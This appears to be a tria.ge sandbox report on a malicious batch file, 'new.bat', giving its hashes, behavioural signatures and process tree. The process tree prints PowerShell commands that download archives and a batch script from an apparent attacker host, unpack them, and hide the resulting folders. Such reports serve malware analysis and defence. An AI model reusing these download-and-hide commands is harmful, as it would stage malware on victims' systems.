Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
15s -
max time network
18s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
15/08/2024, 16:50
Static task
static1
Behavioral task
behavioral1
Sample
new.bat
Resource
win7-20240705-en
General
-
Target
new.bat
-
Size
18.0MB
-
MD5
35168f928a81982fc428113f484ea21e
-
SHA1
2029d685911c351cea2857e12c1755df330e4978
-
SHA256
496ba960a9fdf59b00191e7750cfc3940fe5a49610988799cbe3d9cc5d3f5344
-
SHA512
4b2dc4e91c04180cb372460231e75270252f389231d759bcd96af05dbb479647d39e860e3f22dcf7041e8ec214a1a12125e8ccf52cd26f87d13ee163d58726ec
-
SSDEEP
48:HmGJ3NlBmmTaQgTymDyb4J7rmxo6rmxoAbYk8OkeFhCaoe1aLHtZQ5ImvBSygyGV:H9FmmNfjwhSCu7OmLT7SkoLEu3S0yhr
Malware Config
Signatures
-
pid Process 2820 powershell.exe 2680 powershell.exe 2692 powershell.exe 2816 powershell.exe 268 powershell.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2740 timeout.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2692 powershell.exe 2820 powershell.exe 2816 powershell.exe 268 powershell.exe 2680 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2692 powershell.exe Token: SeDebugPrivilege 2820 powershell.exe Token: SeDebugPrivilege 2816 powershell.exe Token: SeDebugPrivilege 268 powershell.exe Token: SeDebugPrivilege 2680 powershell.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 2176 wrote to memory of 2692 2176 cmd.exe 32 PID 2176 wrote to memory of 2692 2176 cmd.exe 32 PID 2176 wrote to memory of 2692 2176 cmd.exe 32 PID 2176 wrote to memory of 2820 2176 cmd.exe 33 PID 2176 wrote to memory of 2820 2176 cmd.exe 33 PID 2176 wrote to memory of 2820 2176 cmd.exe 33 PID 2176 wrote to memory of 2740 2176 cmd.exe 34 PID 2176 wrote to memory of 2740 2176 cmd.exe 34 PID 2176 wrote to memory of 2740 2176 cmd.exe 34 PID 2176 wrote to memory of 2500 2176 cmd.exe 35 PID 2176 wrote to memory of 2500 2176 cmd.exe 35 PID 2176 wrote to memory of 2500 2176 cmd.exe 35 PID 2176 wrote to memory of 2816 2176 cmd.exe 36 PID 2176 wrote to memory of 2816 2176 cmd.exe 36 PID 2176 wrote to memory of 2816 2176 cmd.exe 36 PID 2176 wrote to memory of 268 2176 cmd.exe 37 PID 2176 wrote to memory of 268 2176 cmd.exe 37 PID 2176 wrote to memory of 268 2176 cmd.exe 37 PID 2176 wrote to memory of 2680 2176 cmd.exe 38 PID 2176 wrote to memory of 2680 2176 cmd.exe 38 PID 2176 wrote to memory of 2680 2176 cmd.exe 38 PID 2176 wrote to memory of 1364 2176 cmd.exe 39 PID 2176 wrote to memory of 1364 2176 cmd.exe 39 PID 2176 wrote to memory of 1364 2176 cmd.exe 39 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 2500 attrib.exe 1364 attrib.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\new.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2176 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipmng.site:9676/DXJS.zip' -OutFile 'C:\Users\Admin\Downloads\DXJS.zip' }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\DXJS.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2820
-
-
C:\Windows\system32\timeout.exetimeout /t 5 REM Wait for extraction to finish (adjust timeout as needed)2⤵
- Delays execution with timeout.exe
PID:2740
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\Downloads\Python"2⤵
- Views/modifies file attributes
PID:2500
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipmng.site:9676/startupppp.bat' -OutFile 'C:\Users\Admin\Downloads\startupppp.bat' }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2816
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipmng.site:9676/FTSP.zip' -OutFile 'C:\Users\Admin\Downloads\FTSP.zip' }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:268
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\FTSP.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2680
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\Downloads\Print"2⤵
- Views/modifies file attributes
PID:1364
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5b4a19d98a1f6fb7b13dbd09c876b1bf6
SHA1020ac698614e2262a53a77f09767b7b25e0c5f08
SHA256334bc694d1a8543421e6f985e981435e9ac6e155a4e685cf7ec376e59520a4ef
SHA5128548dcd00e7a834f7cda271f022179f294258ce2da615730f2dfea1ad2a32315db013835d9f0499016b42b0dab8cbd44946da3ee684df12f6e01b091d851c636